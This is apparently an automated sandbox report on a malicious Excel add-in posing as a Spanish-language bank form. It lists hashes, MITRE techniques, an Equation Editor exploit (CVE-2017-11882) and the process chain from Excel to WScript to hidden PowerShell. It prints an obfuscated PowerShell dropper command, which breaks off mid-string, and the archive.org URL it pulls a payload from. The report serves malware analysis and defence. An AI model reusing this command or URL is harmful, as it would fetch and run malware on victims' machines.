41314659fc6539e493e75d1a0117f847edeb027c6274cbb0e829f38275a66746

General

Target

03286786476_formulario bancario.xlam
Size

658KB
MD5

51e4c0064961c9c7d11422c8af4624c6
SHA1

0765b35965e1e817cab7f1dac05d8a01e0962c75
SHA256

41314659fc6539e493e75d1a0117f847edeb027c6274cbb0e829f38275a66746
SHA512

ff8be749338dff2354bf1070b0b44f80222d47be864f2ecd77d838598ca30b3c99057995ae4d0739d07568edee5d7b40918e7b6b0a521b6f171ff3e790593a56
SSDEEP

12288:/1fSSiZ7RZEN1HvkryB/UbzUQqnOERQ1W9LnD5hXWEBayEaUXNP2eDfHsZX:1SSiZ7R6KbzU38w5EEg9PhQ

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2780	EQNEDT32.EXE
7	2696	powershell.exe
8	2696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2772	powershell.exe
2696	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2780	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2548	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2772	powershell.exe
2696	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2548	EXCEL.EXE
2548	EXCEL.EXE
2548	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2204	2780	EQNEDT32.EXE	30
PID 2780 wrote to memory of 2204	2780	EQNEDT32.EXE	30
PID 2780 wrote to memory of 2204	2780	EQNEDT32.EXE	30
PID 2780 wrote to memory of 2204	2780	EQNEDT32.EXE	30
PID 2204 wrote to memory of 2772	2204	WScript.exe	31
PID 2204 wrote to memory of 2772	2204	WScript.exe	31
PID 2204 wrote to memory of 2772	2204	WScript.exe	31
PID 2204 wrote to memory of 2772	2204	WScript.exe	31
PID 2772 wrote to memory of 2696	2772	powershell.exe	33
PID 2772 wrote to memory of 2696	2772	powershell.exe	33
PID 2772 wrote to memory of 2696	2772	powershell.exe	33
PID 2772 wrote to memory of 2696	2772	powershell.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\03286786476_formulario bancario.xlam"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2548

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\controfireftpfridayequitosdatinglover.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J䷊ ꒠ ㎳ ⦱ ﯀Bp䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀VQBy䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀9䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀JwBo䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bw䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀Og䷊ ꒠ ㎳ ⦱ ﯀v䷊ ꒠ ㎳ ⦱ ﯀C8䷊ ꒠ ㎳ ⦱ ﯀aQBh䷊ ꒠ ㎳ ⦱ ﯀Dg䷊ ꒠ ㎳ ⦱ ﯀M䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀z䷊ ꒠ ㎳ ⦱ ﯀DE䷊ ꒠ ㎳ ⦱ ﯀M䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀C4䷊ ꒠ ㎳ ⦱ ﯀dQBz䷊ ꒠ ㎳ ⦱ ﯀C4䷊ ꒠ ㎳ ⦱ ﯀YQBy䷊ ꒠ ㎳ ⦱ ﯀GM䷊ ꒠ ㎳ ⦱ ﯀a䷊ ꒠ ㎳ ⦱ ﯀Bp䷊ ꒠ ㎳ ⦱ ﯀HY䷊ ꒠ ㎳ ⦱ ﯀ZQ䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀G8䷊ ꒠ ㎳ ⦱ ﯀cgBn䷊ ꒠ ㎳ ⦱ ﯀C8䷊ ꒠ ㎳ ⦱ ﯀Mg䷊ ꒠ ㎳ ⦱ ﯀3䷊ ꒠ ㎳ ⦱ ﯀C8䷊ ꒠ ㎳ ⦱ ﯀aQB0䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bQBz䷊ ꒠ ㎳ ⦱ ﯀C8䷊ ꒠ ㎳ ⦱ ﯀dgBi䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀Xw䷊ ꒠ ㎳ ⦱ ﯀y䷊ ꒠ ㎳ ⦱ ﯀D䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀Mg䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀D䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀Nw䷊ ꒠ ㎳ ⦱ ﯀y䷊ ꒠ ㎳ ⦱ ﯀DY䷊ ꒠ ㎳ ⦱ ﯀Xw䷊ ꒠ ㎳ ⦱ ﯀y䷊ ꒠ ㎳ ⦱ ﯀D䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀Mg䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀D䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀Nw䷊ ꒠ ㎳ ⦱ ﯀y䷊ ꒠ ㎳ ⦱ ﯀DY䷊ ꒠ ㎳ ⦱ ﯀LwB2䷊ ꒠ ㎳ ⦱ ﯀GI䷊ ꒠ ㎳ ⦱ ﯀cw䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀Go䷊ ꒠ ㎳ ⦱ ﯀c䷊ ꒠ ㎳ ⦱ ﯀Bn䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀Ow䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀Hc䷊ ꒠ ㎳ ⦱ ﯀ZQBi䷊ ꒠ ㎳ ⦱ ﯀EM䷊ ꒠ ㎳ ⦱ ﯀b䷊ ꒠ ㎳ ⦱ ﯀Bp䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bgB0䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀PQ䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀E4䷊ ꒠ ㎳ ⦱ ﯀ZQB3䷊ ꒠ ㎳ ⦱ ﯀C0䷊ ꒠ ㎳ ⦱ ﯀TwBi䷊ ꒠ ㎳ ⦱ ﯀Go䷊ ꒠ ㎳ ⦱ ﯀ZQBj䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀BT䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀cwB0䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bQ䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀E4䷊ ꒠ ㎳ ⦱ ﯀ZQB0䷊ ꒠ ㎳ ⦱ ﯀C4䷊ ꒠ ㎳ ⦱ ﯀VwBl䷊ ꒠ ㎳ ⦱ ﯀GI䷊ ꒠ ㎳ ⦱ ﯀QwBs䷊ ꒠ ㎳ ⦱ ﯀Gk䷊ ꒠ ㎳ ⦱ ﯀ZQBu䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀Ow䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀Gk䷊ ꒠ ㎳ ⦱ ﯀bQBh䷊ ꒠ ㎳ ⦱ ﯀Gc䷊ ꒠ ㎳ ⦱ ﯀ZQBC䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀9䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀B3䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀YgBD䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀aQBl䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀EQ䷊ ꒠ ㎳ ⦱ ﯀bwB3䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀b䷊ ꒠ ㎳ ⦱ ﯀Bv䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀BE䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀Cg䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀Bp䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀VQBy䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀KQ䷊ ꒠ ㎳ ⦱ ﯀7䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀aQBt䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀ZwBl䷊ ꒠ ㎳ ⦱ ﯀FQ䷊ ꒠ ㎳ ⦱ ﯀ZQB4䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀9䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀WwBT䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀cwB0䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bQ䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀FQ䷊ ꒠ ㎳ ⦱ ﯀ZQB4䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀LgBF䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀YwBv䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀aQBu䷊ ꒠ ㎳ ⦱ ﯀Gc䷊ ꒠ ㎳ ⦱ ﯀XQ䷊ ꒠ ㎳ ⦱ ﯀6䷊ ꒠ ㎳ ⦱ ﯀Do䷊ ꒠ ㎳ ⦱ ﯀VQBU䷊ ꒠ ㎳ ⦱ ﯀EY䷊ ꒠ ㎳ ⦱ ﯀O䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀Ec䷊ ꒠ ㎳ ⦱ ﯀ZQB0䷊ ꒠ ㎳ ⦱ ﯀FM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀By䷊ ꒠ ㎳ ⦱ ﯀Gk䷊ ꒠ ㎳ ⦱ ﯀bgBn䷊ ꒠ ㎳ ⦱ ﯀Cg䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀Bp䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀QgB5䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀ZQBz䷊ ꒠ ㎳ ⦱ ﯀Ck䷊ ꒠ ㎳ ⦱ ﯀Ow䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BG䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀PQ䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀P䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀8䷊ ꒠ ㎳ ⦱ ﯀EI䷊ ꒠ ㎳ ⦱ ﯀QQBT䷊ ꒠ ㎳ ⦱ ﯀EU䷊ ꒠ ㎳ ⦱ ﯀Ng䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀F8䷊ ꒠ ㎳ ⦱ ﯀UwBU䷊ ꒠ ㎳ ⦱ ﯀EE䷊ ꒠ ㎳ ⦱ ﯀UgBU䷊ ꒠ ㎳ ⦱ ﯀D4䷊ ꒠ ㎳ ⦱ ﯀Pg䷊ ꒠ ㎳ ⦱ ﯀n䷊ ꒠ ㎳ ⦱ ﯀Ds䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀BG䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀PQ䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀P䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀8䷊ ꒠ ㎳ ⦱ ﯀EI䷊ ꒠ ㎳ ⦱ ﯀QQBT䷊ ꒠ ㎳ ⦱ ﯀EU䷊ ꒠ ㎳ ⦱ ﯀Ng䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀F8䷊ ꒠ ㎳ ⦱ ﯀RQBO䷊ ꒠ ㎳ ⦱ ﯀EQ䷊ ꒠ ㎳ ⦱ ﯀Pg䷊ ꒠ ㎳ ⦱ ﯀+䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀Ow䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BJ䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀Hg䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀9䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀Bp䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀V䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀Hg䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀Ek䷊ ꒠ ㎳ ⦱ ﯀bgBk䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀e䷊ ꒠ ㎳ ⦱ ﯀BP䷊ ꒠ ㎳ ⦱ ﯀GY䷊ ꒠ ㎳ ⦱ ﯀K䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BG䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀Ck䷊ ꒠ ㎳ ⦱ ﯀Ow䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bgBk䷊ ꒠ ㎳ ⦱ ﯀Ek䷊ ꒠ ㎳ ⦱ ﯀bgBk䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀e䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀D0䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀Gk䷊ ꒠ ㎳ ⦱ ﯀bQBh䷊ ꒠ ㎳ ⦱ ﯀Gc䷊ ꒠ ㎳ ⦱ ﯀ZQBU䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀e䷊ ꒠ ㎳ ⦱ ﯀B0䷊ ꒠ ㎳ ⦱ ﯀C4䷊ ꒠ ㎳ ⦱ ﯀SQBu䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀ZQB4䷊ ꒠ ㎳ ⦱ ﯀E8䷊ ꒠ ㎳ ⦱ ﯀Zg䷊ ꒠ ㎳ ⦱ ﯀o䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀ZQBu䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀RgBs䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀Zw䷊ ꒠ ㎳ ⦱ ﯀p䷊ ꒠ ㎳ ⦱ ﯀Ds䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀Bz䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀YQBy䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀SQBu䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀ZQB4䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀LQBn䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀w䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀LQBh䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀ZQBu䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀SQBu䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀ZQB4䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀LQBn䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BJ䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀Hg䷊ ꒠ ㎳ ⦱ ﯀Ow䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BJ䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀Hg䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀r䷊ ꒠ ㎳ ⦱ ﯀D0䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BG䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀YQBn䷊ ꒠ ㎳ ⦱ ﯀C4䷊ ꒠ ㎳ ⦱ ﯀T䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀ZwB0䷊ ꒠ ㎳ ⦱ ﯀Gg䷊ ꒠ ㎳ ⦱ ﯀Ow䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀GI䷊ ꒠ ㎳ ⦱ ﯀YQBz䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀Ng䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀Ew䷊ ꒠ ㎳ ⦱ ﯀ZQBu䷊ ꒠ ㎳ ⦱ ﯀Gc䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bo䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀PQ䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀ZQBu䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀SQBu䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀ZQB4䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀LQ䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀cwB0䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀cgB0䷊ ꒠ ㎳ ⦱ ﯀Ek䷊ ꒠ ㎳ ⦱ ﯀bgBk䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀e䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀7䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀YgBh䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀ZQ䷊ ꒠ ㎳ ⦱ ﯀2䷊ ꒠ ㎳ ⦱ ﯀DQ䷊ ꒠ ㎳ ⦱ ﯀QwBv䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀bQBh䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀D0䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀Gk䷊ ꒠ ㎳ ⦱ ﯀bQBh䷊ ꒠ ㎳ ⦱ ﯀Gc䷊ ꒠ ㎳ ⦱ ﯀ZQBU䷊ 